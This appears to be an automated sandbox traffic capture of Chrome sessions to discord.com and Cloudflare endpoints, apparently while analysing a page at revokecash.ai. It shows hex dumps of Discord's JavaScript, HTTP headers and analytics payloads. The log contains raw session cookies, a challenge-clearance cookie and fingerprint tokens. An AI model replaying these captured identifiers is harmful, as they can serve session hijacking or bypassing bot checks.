                                                                          2023-12-10 16:45:22 UTC965INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 37 32 32 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 33 37 36 64 64 33 62 33 63 65 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:22 GMTContent-Type: application/javascriptContent-Length: 17222Connection: closeCF-Ray: 8336f5376dd3b3ce-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:22 UTC404INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 38 39 39 35 22 5d 2c 7b 34 36 37 37 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 65 2e 65 78 70 6f 72 74 73 3d 6c 2e 70 2b 22 32 38 39 62 36 30 35 33 66 63 36 61 38 39 64 37 35 34 35 32 2e 73 76 67 22 7d 2c 38 38 38 35 30 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6c 2e 72 28 74 29 2c 6c 2e 64 28 74 2c 7b 41 56 41 54 41 52 5f 44 45 43 4f 52 41 54 49 4f 4e 5f 50 41 44 44 49 4e 47 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4c 7d 2c
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["78995"],{46773:function(e,t,l){"use strict";e.exports=l.p+"289b6053fc6a89d75452.svg"},888503:function(e,t,l){"use strict";l.r(t),l.d(t,{AVATAR_DECORATION_PADDING:function(){return L},
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 22 29 2c 63 3d 6c 28 22 33 35 37 30 32 31 22 29 2c 66 3d 6c 28 22 31 30 36 34 33 35 22 29 2c 6d 3d 6c 28 22 37 39 37 39 38 22 29 2c 70 3d 6c 28 22 39 38 32 34 37 35 22 29 2c 68 3d 6c 28 22 39 32 38 32 30 31 22 29 2c 76 3d 6c 28 22 31 31 38 35 30 33 22 29 2c 78 3d 6c 28 22 31 31 30 35 36 22 29 2c 49 3d 6c 28 22 31 35 39 38 38 35 22 29 2c 67 3d 6c 28 22 31 35 38 39 39 38 22 29 2c 53 3d 6c 28 22 39 34 33 37 32 32 22 29 2c 45 3d 6c 28 22 34 39 31 31 31 22 29 2c 6a 3d 6c 28 22 39 38 38 32 36 38 22 29 2c 4e 3d 6c 28 22 33 39 31 34 31 22 29 2c 54 3d 6c 28 22 37 38 32 33 34 30 22 29 2c 43 3d 6c 28 22 32 38 32 37 33 30 22 29 3b 6c 65 74 20 4c 3d 28 30 2c 49 2e 63 73 73 56 61 6c 75 65 54 6f 4e 75 6d 62 65 72 29 28 69 2e 64 65 66 61 75 6c 74 2e 4d 45 4d 42 45 52 5f
                                                                          Data Ascii: "),c=l("357021"),f=l("106435"),m=l("79798"),p=l("982475"),h=l("928201"),v=l("118503"),x=l("11056"),I=l("159885"),g=l("158998"),S=l("943722"),E=l("49111"),j=l("988268"),N=l("39141"),T=l("782340"),C=l("282730");let L=(0,I.cssValueToNumber)(i.default.MEMBER_
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 63 6c 61 73 73 4e 61 6d 65 3a 43 2e 70 72 65 6d 69 75 6d 49 63 6f 6e 7d 29 7d 29 7d 29 2c 65 64 3d 28 29 3d 3e 7b 6c 65 74 20 65 3d 28 6e 75 6c 6c 3d 3d 5f 3f 76 6f 69 64 20 30 3a 5f 2e 69 73 43 6c 79 64 65 28 29 29 3f 6a 2e 42 6f 74 54 61 67 54 79 70 65 73 2e 41 49 3a 6a 2e 42 6f 74 54 61 67 54 79 70 65 73 2e 42 4f 54 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 5f 26 26 5f 2e 62 6f 74 3f 28 30 2c 61 2e 6a 73 78 29 28 6d 2e 64 65 66 61 75 6c 74 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 43 2e 62 6f 74 54 61 67 2c 74 79 70 65 3a 65 2c 76 65 72 69 66 69 65 64 3a 5f 2e 69 73 56 65 72 69 66 69 65 64 42 6f 74 28 29 7d 29 3a 6e 75 6c 6c 7d 2c 65 63 3d 28 29 3d 3e 28 30 2c 61 2e 6a 73 78 29 28 75 2e 4e 61 6d 65 57 69 74 68 52 6f 6c 65 2c 7b 72 6f 6c 65 4e 61 6d 65 3a 6e
                                                                          Data Ascii: className:C.premiumIcon})})}),ed=()=>{let e=(null==_?void 0:_.isClyde())?j.BotTagTypes.AI:j.BotTagTypes.BOT;return null!=_&&_.bot?(0,a.jsx)(m.default,{className:C.botTag,type:e,verified:_.isVerifiedBot()}):null},ec=()=>(0,a.jsx)(u.NameWithRole,{roleName:n
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 26 6e 75 6c 6c 21 3d 5f 26 26 28 30 2c 64 2e 64 65 66 61 75 6c 74 29 28 65 2c 5f 2c 6b 29 3b 72 65 74 75 72 6e 28 30 2c 61 2e 6a 73 78 29 28 53 2e 64 65 66 61 75 6c 74 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 43 2e 61 63 74 69 76 69 74 79 2c 74 65 78 74 43 6c 61 73 73 4e 61 6d 65 3a 43 2e 61 63 74 69 76 69 74 79 54 65 78 74 2c 65 6d 6f 6a 69 43 6c 61 73 73 4e 61 6d 65 3a 43 2e 61 63 74 69 76 69 74 79 45 6d 6f 6a 69 2c 61 63 74 69 76 69 74 69 65 73 3a 50 2c 61 70 70 6c 69 63 61 74 69 6f 6e 53 74 72 65 61 6d 3a 79 2c 61 6e 69 6d 61 74 65 3a 65 65 2c 68 69 64 65 45 6d 6f 6a 69 3a 21 74 2c 68 69 64 65 54 6f 6f 6c 74 69 70 3a 21 30 2c 75 73 65 72 3a 5f 7d 29 7d 29 28 29 2c 64 65 63 6f 72 61 74 6f 72 73 3a 28 30 2c 61 2e 6a 73 78 73 29 28 61 2e 46 72 61 67 6d 65 6e
                                                                          Data Ascii: &null!=_&&(0,d.default)(e,_,k);return(0,a.jsx)(S.default,{className:C.activity,textClassName:C.activityText,emojiClassName:C.activityEmoji,activities:P,applicationStream:y,animate:ee,hideEmoji:!t,hideTooltip:!0,user:_})})(),decorators:(0,a.jsxs)(a.Fragmen
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 6e 63 74 69 6f 6e 20 75 28 65 2c 74 2c 6c 29 7b 69 66 28 65 2e 74 79 70 65 21 3d 3d 69 2e 41 63 74 69 76 69 74 79 54 79 70 65 73 2e 43 55 53 54 4f 4d 5f 53 54 41 54 55 53 7c 7c 6e 75 6c 6c 3d 3d 65 2e 65 6d 6f 6a 69 29 72 65 74 75 72 6e 21 31 3b 6c 65 74 20 75 3d 65 2e 65 6d 6f 6a 69 3b 69 66 28 6e 75 6c 6c 3d 3d 75 2e 69 64 7c 7c 6e 75 6c 6c 3d 3d 6c 7c 7c 21 28 30 2c 72 2e 69 73 47 75 69 6c 64 54 65 78 74 43 68 61 6e 6e 65 6c 54 79 70 65 29 28 6c 2e 74 79 70 65 29 29 72 65 74 75 72 6e 21 30 3b 6c 65 74 20 6f 3d 61 2e 64 65 66 61 75 6c 74 2e 67 65 74 55 73 61 62 6c 65 43 75 73 74 6f 6d 45 6d 6f 6a 69 42 79 49 64 28 75 2e 69 64 29 2c 64 3d 6e 2e 64 65 66 61 75 6c 74 2e 69 73 49 6e 74 65 72 6e 61 6c 45 6d 6f 6a 69 46 6f 72 47 75 69 6c 64 49 64 28 6f 2c 6c
                                                                          Data Ascii: nction u(e,t,l){if(e.type!==i.ActivityTypes.CUSTOM_STATUS||null==e.emoji)return!1;let u=e.emoji;if(null==u.id||null==l||!(0,r.isGuildTextChannelType)(l.type))return!0;let o=a.default.getUsableCustomEmojiById(u.id),d=n.default.isInternalEmojiForGuildId(o,l
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 3a 31 34 2c 77 69 64 74 68 3a 31 34 2c 6c 69 6e 65 48 65 69 67 68 74 3a 31 38 7d 7d 29 5d 29 2c 45 3d 64 28 69 2e 64 65 66 61 75 6c 74 2e 41 55 54 4f 5f 4d 4f 44 45 52 41 54 49 4f 4e 5f 53 59 53 54 45 4d 5f 4d 45 53 53 41 47 45 5f 52 55 4c 45 53 2c 5b 28 30 2c 73 2e 64 65 66 61 75 6c 74 29 28 63 29 5d 29 2c 6a 3d 72 2e 6f 6d 69 74 28 64 28 69 2e 64 65 66 61 75 6c 74 2e 52 55 4c 45 53 2c 5b 28 30 2c 73 2e 64 65 66 61 75 6c 74 29 28 7b 2e 2e 2e 63 2c 65 6d 6f 6a 69 3a 7b 68 65 69 67 68 74 3a 31 34 2c 77 69 64 74 68 3a 31 34 7d 7d 29 5d 29 2c 22 70 61 72 61 67 72 61 70 68 22 2c 22 6e 65 77 6c 69 6e 65 22 2c 22 73 74 72 6f 6e 67 22 2c 22 63 6f 64 65 42 6c 6f 63 6b 22 2c 22 69 6e 6c 69 6e 65 43 6f 64 65 22 2c 22 75 22 2c 22 6c 69 6e 6b 22 2c 22 75 72 6c 22 2c
                                                                          Data Ascii: :14,width:14,lineHeight:18}})]),E=d(i.default.AUTO_MODERATION_SYSTEM_MESSAGE_RULES,[(0,s.default)(c)]),j=r.omit(d(i.default.RULES,[(0,s.default)({...c,emoji:{height:14,width:14}})]),"paragraph","newline","strong","codeBlock","inlineCode","u","link","url",
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 30 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6c 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6c 2e 72 28 74 29 2c 6c 2e 64 28 74 2c 7b 64 65 66 61 75 6c 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 7d 7d 29 3b 76 61 72 20 61 3d 6c 28 22 33 37 39 38 33 22 29 3b 6c 28 22 38 38 34 36 39 31 22 29 3b 76 61 72 20 72 3d 6c 28 22 32 37 32 30 33 30 22 29 2c 6e 3d 6c 28 22 36 34 33 33 30 36 22 29 2c 73 3d 6c 28 22 34 37 30 36 34 38 22 29 2c 69 3d 6c 28 22 34 32 32 30 33 22 29 2c 75 3d 7b 68 61 6e 64 6c 65 55 73 65 72 43 6f 6e 74 65 78 74 4d 65 6e 75 28 65 2c 74 2c 6e 2c 73 29 7b 6c 65 74 20 75 3d 69 2e 64 65 66 61 75 6c 74 2e 67 65 74 43 68 61 6e 6e 65 6c 28 74 29 3b 6e 75 6c 6c 21 3d 75 26 26 28 30 2c 72 2e 6f 70 65 6e 43 6f 6e 74 65 78 74 4d 65
                                                                          Data Ascii: 0:function(e,t,l){"use strict";l.r(t),l.d(t,{default:function(){return u}});var a=l("37983");l("884691");var r=l("272030"),n=l("643306"),s=l("470648"),i=l("42203"),u={handleUserContextMenu(e,t,n,s){let u=i.default.getChannel(t);null!=u&&(0,r.openContextMe
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 2c 79 3d 28 30 2c 6f 2e 75 73 65 53 74 61 74 65 46 72 6f 6d 53 74 6f 72 65 73 29 28 5b 6d 2e 64 65 66 61 75 6c 74 5d 2c 28 29 3d 3e 6d 2e 64 65 66 61 75 6c 74 2e 72 6f 6c 65 53 74 79 6c 65 29 2c 62 3d 6e 75 6c 6c 21 3d 74 26 26 30 21 3d 3d 74 26 26 21 50 2c 46 3d 62 26 26 22 64 6f 74 22 3d 3d 3d 79 2c 55 3d 65 3d 3e 28 30 2c 61 2e 6a 73 78 73 29 28 4e 2e 64 65 66 61 75 6c 74 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 6e 28 4d 2e 72 6f 6c 65 4d 65 6e 74 69 6f 6e 29 2c 63 6f 6c 6f 72 3a 22 75 73 65 72 6e 61 6d 65 22 3d 3d 3d 79 26 26 62 3f 74 3a 6e 75 6c 6c 2c 2e 2e 2e 65 2c 63 68 69 6c 64 72 65 6e 3a 5b 46 26 26 28 30 2c 61 2e 6a 73 78 29 28 64 2e 52 6f 6c 65 44 6f 74 2c 7b 63 6f 6c 6f 72 3a 28 30 2c 75 2e 69 6e 74 32 68 65 78 29 28 74 29 2c 63 6c 61 73 73 4e 61
                                                                          Data Ascii: ,y=(0,o.useStateFromStores)([m.default],()=>m.default.roleStyle),b=null!=t&&0!==t&&!P,F=b&&"dot"===y,U=e=>(0,a.jsxs)(N.default,{className:n(M.roleMention),color:"username"===y&&b?t:null,...e,children:[F&&(0,a.jsx)(d.RoleDot,{color:(0,u.int2hex)(t),classNa
                                                                          2023-12-10 16:45:22 UTC1369INData Raw: 6d 69 75 6d 53 69 6e 63 65 3f 6e 75 6c 6c 3a 6e 65 77 20 44 61 74 65 28 65 2e 70 72 65 6d 69 75 6d 53 69 6e 63 65 29 2c 63 68 61 6e 6e 65 6c 3a 74 2c 67 75 69 6c 64 49 64 3a 6e 2e 69 64 2c 6f 6e 43 6f 6e 74 65 78 74 4d 65 6e 75 3a 65 3d 3e 7b 28 30 2c 63 2e 6f 70 65 6e 43 6f 6e 74 65 78 74 4d 65 6e 75 4c 61 7a 79 29 28 65 2c 61 73 79 6e 63 28 29 3d 3e 7b 6c 65 74 7b 64 65 66 61 75 6c 74 3a 65 7d 3d 61 77 61 69 74 20 6c 2e 65 6c 28 22 38 33 34 32 34 37 22 29 2e 74 68 65 6e 28 6c 2e 62 69 6e 64 28 6c 2c 22 38 33 34 32 34 37 22 29 29 3b 72 65 74 75 72 6e 20 6c 3d 3e 28 30 2c 61 2e 6a 73 78 29 28 65 2c 7b 2e 2e 2e 6c 2c 75 73 65 72 3a 72 2c 67 75 69 6c 64 49 64 3a 6e 2e 69 64 2c 63 68 61 6e 6e 65 6c 3a 74 2c 73 68 6f 77 4d 65 64 69 61 49 74 65 6d 73 3a 21 30
                                                                          Data Ascii: miumSince?null:new Date(e.premiumSince),channel:t,guildId:n.id,onContextMenu:e=>{(0,c.openContextMenuLazy)(e,async()=>{let{default:e}=await l.el("834247").then(l.bind(l,"834247"));return l=>(0,a.jsx)(e,{...l,user:r,guildId:n.id,channel:t,showMediaItems:!0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          341192.168.2.55007735.190.80.14435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:22 UTC532OUTOPTIONS /report/v3?s=TMxqg5XRHDVa%2FCo9xlL8cpxYpnS5qnplAnvBGXOR5odnSCfdPvlUCGoJv1%2F8zuPD65ZHj2AJl%2FGafIs1WqLol2f%2F6o2BXiQilYt3lWPNsuxQVohkIByE4xZFLp%2FiI6Ys HTTP/1.1
                                                                          Host: a.nel.cloudflare.com
                                                                          Connection: keep-alive
                                                                          Origin: https://revokecash.ai
                                                                          Access-Control-Request-Method: POST
                                                                          Access-Control-Request-Headers: content-type
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:45:22 UTC336INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 6d 61 78 2d 61 67 65 3a 20 38 36 34 30 30 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6d 65 74 68 6f 64 73 3a 20 4f 50 54 49 4f 4e 53 2c 20 50 4f 53 54 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 2a 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 68 65 61 64 65 72 73 3a 20 63 6f 6e 74 65 6e 74 2d 6c 65 6e 67 74 68 2c 20 63 6f 6e 74 65 6e 74 2d 74 79 70 65 0d 0a 64 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 32 20 47 4d 54 0d 0a 56 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c
                                                                          Data Ascii: HTTP/1.1 200 OKContent-Length: 0access-control-max-age: 86400access-control-allow-methods: OPTIONS, POSTaccess-control-allow-origin: *access-control-allow-headers: content-length, content-typedate: Sun, 10 Dec 2023 16:45:22 GMTVia: 1.1 googl


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          342192.168.2.550078162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:22 UTC912OUTPOST /cdn-cgi/challenge-platform/h/b/jsd/r/8336f4d76ab16db3 HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 15804
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-platform: "Windows"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Content-Type: application/json
                                                                          Accept: */*
                                                                          Origin: https://discord.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dUADPbAb8vBkHij6WYnb9DCSlaRQYa31enz.ClHakeY-1702226722245-0-604800000
                                                                          2023-12-10 16:45:22 UTC15804OUTData Raw: 7b 22 77 70 22 3a 22 41 64 56 46 59 48 50 6a 59 6c 56 59 51 57 42 50 47 50 76 44 55 46 48 63 44 37 65 44 68 38 68 73 73 48 6a 50 36 61 44 4a 6e 63 53 6e 33 56 44 79 4a 66 67 42 6e 6c 50 78 44 51 47 56 62 4b 64 64 44 37 4c 73 44 6b 44 73 63 73 56 50 44 49 73 50 75 42 31 46 4c 6c 64 70 77 34 46 4a 6e 35 64 65 37 72 78 76 57 62 54 46 75 35 59 2b 65 4f 50 72 61 4a 4c 68 44 59 56 56 6d 68 79 48 70 4b 44 74 62 4b 33 71 70 44 71 46 57 79 44 48 2b 56 44 68 46 48 48 46 35 51 46 68 44 50 6e 44 55 6c 30 44 50 4f 70 44 2d 24 6a 37 62 64 66 50 37 4c 4b 56 44 48 24 70 44 48 42 67 55 44 67 48 44 50 70 49 33 52 56 34 78 65 63 48 62 48 50 71 75 65 64 61 59 35 39 7a 71 4a 44 38 46 48 68 45 69 64 44 6a 30 64 6e 57 33 4a 32 49 62 44 67 7a 71 4c 35 38 37 46 44 52 4c 38 33 68
                                                                          Data Ascii: {"wp":"AdVFYHPjYlVYQWBPGPvDUFHcD7eDh8hssHjP6aDJncSn3VDyJfgBnlPxDQGVbKddD7LsDkDscsVPDIsPuB1FLldpw4FJn5de7rxvWbTFu5Y+eOPraJLhDYVVmhyHpKDtbK3qpDqFWyDH+VDhFHHF5QFhDPnDUl0DPOpD-$j7bdfP7LKVDH$pDHBgUDgHDPpI3RV4xecHbHPquedaY59zqJD8FHhEidDj0dnW3J2IbDgzqL587FDRL83h
                                                                          2023-12-10 16:45:22 UTC867INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 63 66 5f 63 6c 65 61 72 61 6e 63 65 3d 63 45 38 48 76 37 46 54 78 41 6d 69 6d 68 4a 43 67 50 57 33 74 6e 7a 63 74 5f 73 54 37 74 36 62 37 76 61 52 59 78 37 63 46 67 63 2d 31 37 30 32 32 32 36 37 32 32 2d 30 2d 31 2d 62 62 32 38 37 62 61 36 2e 37 38 62 32 38 64 31 35 2e 65 63 32 39 32 34 34 36 2d 30 2e
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:22 GMTContent-Type: text/plain; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: cf_clearance=cE8Hv7FTxAmimhJCgPW3tnzct_sT7t6b7vaRYx7cFgc-1702226722-0-1-bb287ba6.78b28d15.ec292446-0.
                                                                          2023-12-10 16:45:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          343192.168.2.550079162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:22 UTC1674OUTPOST /api/v9/science HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          Content-Length: 615
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          X-Super-Properties: eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiQ2hyb21lIiwiZGV2aWNlIjoiIiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiYnJvd3Nlcl91c2VyX2FnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzExNy4wLjAuMCBTYWZhcmkvNTM3LjM2IiwiYnJvd3Nlcl92ZXJzaW9uIjoiMTE3LjAuMC4wIiwib3NfdmVyc2lvbiI6IjEwIiwicmVmZXJyZXIiOiIiLCJyZWZlcnJpbmdfZG9tYWluIjoiIiwicmVmZXJyZXJfY3VycmVudCI6IiIsInJlZmVycmluZ19kb21haW5fY3VycmVudCI6IiIsInJlbGVhc2VfY2hhbm5lbCI6InN0YWJsZSIsImNsaWVudF9idWlsZF9udW1iZXIiOjI1Mjk2NiwiY2xpZW50X2V2ZW50X3NvdXJjZSI6bnVsbH0=
                                                                          X-Fingerprint: 1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3Was
                                                                          X-Debug-Options: bugReporterEnabled
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          X-Discord-Timezone: Europe/Zurich
                                                                          Content-Type: application/json
                                                                          X-Discord-Locale: en-US
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Origin: https://discord.com
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=dUADPbAb8vBkHij6WYnb9DCSlaRQYa31enz.ClHakeY-1702226722245-0-604800000
                                                                          2023-12-10 16:45:22 UTC615OUTData Raw: 7b 22 65 76 65 6e 74 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 65 78 70 65 72 69 6d 65 6e 74 5f 75 73 65 72 5f 74 72 69 67 67 65 72 65 64 5f 66 61 6c 6c 62 61 63 6b 22 2c 22 66 69 6e 67 65 72 70 72 69 6e 74 22 3a 22 31 31 38 33 34 34 39 33 38 36 38 39 34 37 37 30 33 31 37 2e 69 6d 73 33 74 6d 6f 38 75 5a 4b 4c 46 50 47 32 51 34 77 51 43 6c 77 33 57 61 73 22 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 63 6c 69 65 6e 74 5f 74 72 61 63 6b 5f 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 30 32 32 32 36 37 32 30 33 39 31 2c 22 6e 61 6d 65 22 3a 22 32 30 32 33 2d 30 39 5f 64 65 73 6b 6f 70 5f 69 6e 5f 61 70 70 5f 69 63 6f 6e 22 2c 22 72 65 76 69 73 69 6f 6e 22 3a 37 2c 22 70 6f 70 75 6c 61 74 69 6f 6e 22 3a 30 2c 22 62 75 63 6b 65 74 22 3a 32 2c 22 6c 6f 63 61 74 69
                                                                          Data Ascii: {"events":[{"type":"experiment_user_triggered_fallback","fingerprint":"1183449386894770317.ims3tmo8uZKLFPG2Q4wQClw3Was","properties":{"client_track_timestamp":1702226720391,"name":"2023-09_deskop_in_app_icon","revision":7,"population":0,"bucket":2,"locati
                                                                          2023-12-10 16:45:22 UTC978INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 34 20 4e 6f 20 43 6f 6e 74 65 6e 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 32 32 20 47 4d 54 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 63 63 65 73 73 2d 63 6f 6e 74 72 6f 6c 2d 61 6c 6c 6f 77 2d 6f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f 6d 0d 0a 76 61 72 79 3a 20 4f 72 69 67 69 6e 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 4d 65 74 68 6f 64 2c 20 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 52 65 71 75 65 73 74 2d 48 65 61 64 65 72 73 0d 0a 56 69 61 3a 20 31 2e 31 20 67 6f 6f 67 6c 65 0d 0a 41 6c 74 2d 53 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a
                                                                          Data Ascii: HTTP/1.1 204 No ContentDate: Sun, 10 Dec 2023 16:45:22 GMTConnection: closeaccess-control-allow-origin: https://discord.comvary: Origin, Access-Control-Request-Method, Access-Control-Request-HeadersVia: 1.1 googleAlt-Svc: h3=":443"; ma=86400


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          344192.168.2.550080162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:22 UTC866OUTGET /assets/44504.4d34e216cd6b9c5f65cb.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
